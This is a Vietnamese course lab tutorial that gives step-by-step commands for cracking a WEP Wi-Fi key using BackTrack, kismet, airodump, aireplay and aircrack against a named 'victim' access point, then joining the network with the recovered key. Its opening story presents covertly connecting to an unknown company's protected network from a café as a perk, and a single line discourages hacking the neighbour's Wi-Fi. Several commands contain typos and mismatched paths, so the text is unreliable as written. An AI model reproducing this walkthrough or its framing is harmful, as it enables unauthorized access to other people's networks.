Lesson 3- Beyond Knowledge CRACK WEP IN 365s Đây là bài LAB không bắt buộc, tuy nhiên các học viên nên tham khảo kỹ vì trong kì thi cuối khóa có thể có bài này vì tính chất quan trọng của nó. Để thực hành bài LAB này các bạn có thể sử dụng đĩa Back Track và khởi động trực tiếp từ CD (trong CD này đã bao gồm tất cả các công cụ). Nếu các bạn không muốn, hay không thể sử dụng Attack Tool vì card màn hình, card mạng.. không tương thích có thể tự cài các công cụ kimset, aricrack, aireplay.. để thực hành. -
-
Lưu ý : các hình và video minh họa có thể khác đôi chút khi dùng Auditor hay Back Track do sử dụng Whax (khácvề vị trí các tools, thư mục) nhưng hòan tòan tương thích vớ 2 Attack Tool trên. Không áp dụng bài tập này để hack wireless của nhà hàng xóm.
3 học viên hòan thành bài Lab trong thời gian nhanh nhất sẽ được tặng 1 bộ TrainSinal Lab Wireless Và Tài Liệu Hacking Exposed (Version mới nhất) – Quà tặng gởi qua đường bưu điện. Security 365 Team
Với WiFi bạn có thể truy cập Internet ngay dưới gốc cây này Ngòai ra các bạn cần phải có kiến thức cơ bản về LINUX (những lệnh thông dụng như cd, ls, ..), vì vậy nếu các bạn nào chưa rành về LINUX có thể đăng kí miễn phí bản Linux Unbutu tại dđây hoặc mua bộ đĩa Fedora để thực hành về Linux. Giới thệu: Crack WEP In 365s
- Bạn đang uống café ở quán cóc, tranh thủ thời gian rãnh rỗi mở LapTop để sọan thảo một giải pháp mạng cho công ty khách hàng, tín hiệu đèn wireless nhấp nháy báo tin có AP của 1 công ty nào đó với mức độ Exellent. Thật tuyệt, nhưng hệ thống đã được bảo vệ với Wep Key, bạn không thể kết nối được, . Có lẽ phải vào Zenta hay một quán café wifi miễn phí với giá café “cắt cổ” vậy ☺. Nếu bạn là học viên của Security365.., có thể bạn sẽ online thành công với trình duyệt yêu thích FireFox của mình.
Step By Step : Penetrating Wireless Boot bằng Back Track và start Terminal,kiểm tra card wireless với dòng lệnh : # show-wireless-interface.sh
Và có kết quả là tìm thấy card wlan0 Found: Wlan0 Kiểm tra cấu hình kismet.comf để bảo đảm chính xác bằng công cụ nano /etc/kismet/ kismet.conf # nano /etc/kismet/ kismet.conf
Chạy Kimset từ giao diện đồ họa để thu thập thông tin các AP (access point)
Và xác định được Victim là 2plus đang truyền thông trên chanel 8.
Hãy mở thư mục /pentest/wireless/aireplay-2.2/ và xem các tập tin trong thư mục với lệnh ls –l: #cd /pentest/wireless/aireplay-2.2/ [aireplay-2.2]# ls –l Chãy script start-airplay.sh và sau đó khởi động airplay: [aireplay-2.2]# ./start-airplay.sh [aireplay-2.2]# ./wlangng.sh
Hãy start wlanng trên channel 8 (của victim 2plus) và card wireless được sử dụng là wlan0: [aireplay-2.2]# ./wlanng.sh start wlan0 8
Bây giờ chúng ta qiay lại cửa sổ Terminal đầu và chuyển đến thư mục aircrack-2.1 (trên Linux sử dụng lệnh cd – viết tắt của change directory) #cd /pentest/woreless/aircrack-2.1/ [aircrack-2.1]# ls –l Bắt đầu capturing traffic với atrodump: [aireplay-2.2]# ./airodump [aireplay-2.2]# ./airdump wlan0 2plus
Hãy chờ trong giây lát để capture IV (khỏang 100 – 500 k là đủ)
Trong thời gian chờ airodump hãy chạy aireplay trên cữa sổ còn lại: [aireplay-2.2]# ./aireplay –x 512 wlan0
Chờ cho đến khi IVs tăng lên (ví dụ trong demo chúng ta thấy là 167) chọn y để xác nhận Use this packet?
Theo dõi kết quả trên Terminal 1 chúng ta thấy đã capture được khỏang 160 M traffic (2plus.cap). Tiếp tục với aircrack để bẻ khóa WEP (tùy theo độ dài của khoá mà thời gian crack tiến hành nhanh hay chậm):
[aircrack-2.1]# ./aircrack [aircrack-2.1]# ./aircrack –n 64 2plus.cap
Sau cùng kêt quả đạt được xuất hiện ở KEY FOUND
Bây giờ các bạn có thể kết nối với access point bằng key đã lấy được, trong trường hợp này là 11aa2aa33: [aircrack-2.1]# iwconfig wlan0 key 11aa2aa33 Và hãy kiểm tra lạikết quả hacking/penetrating của mình với lệnh: # ping www.security365.org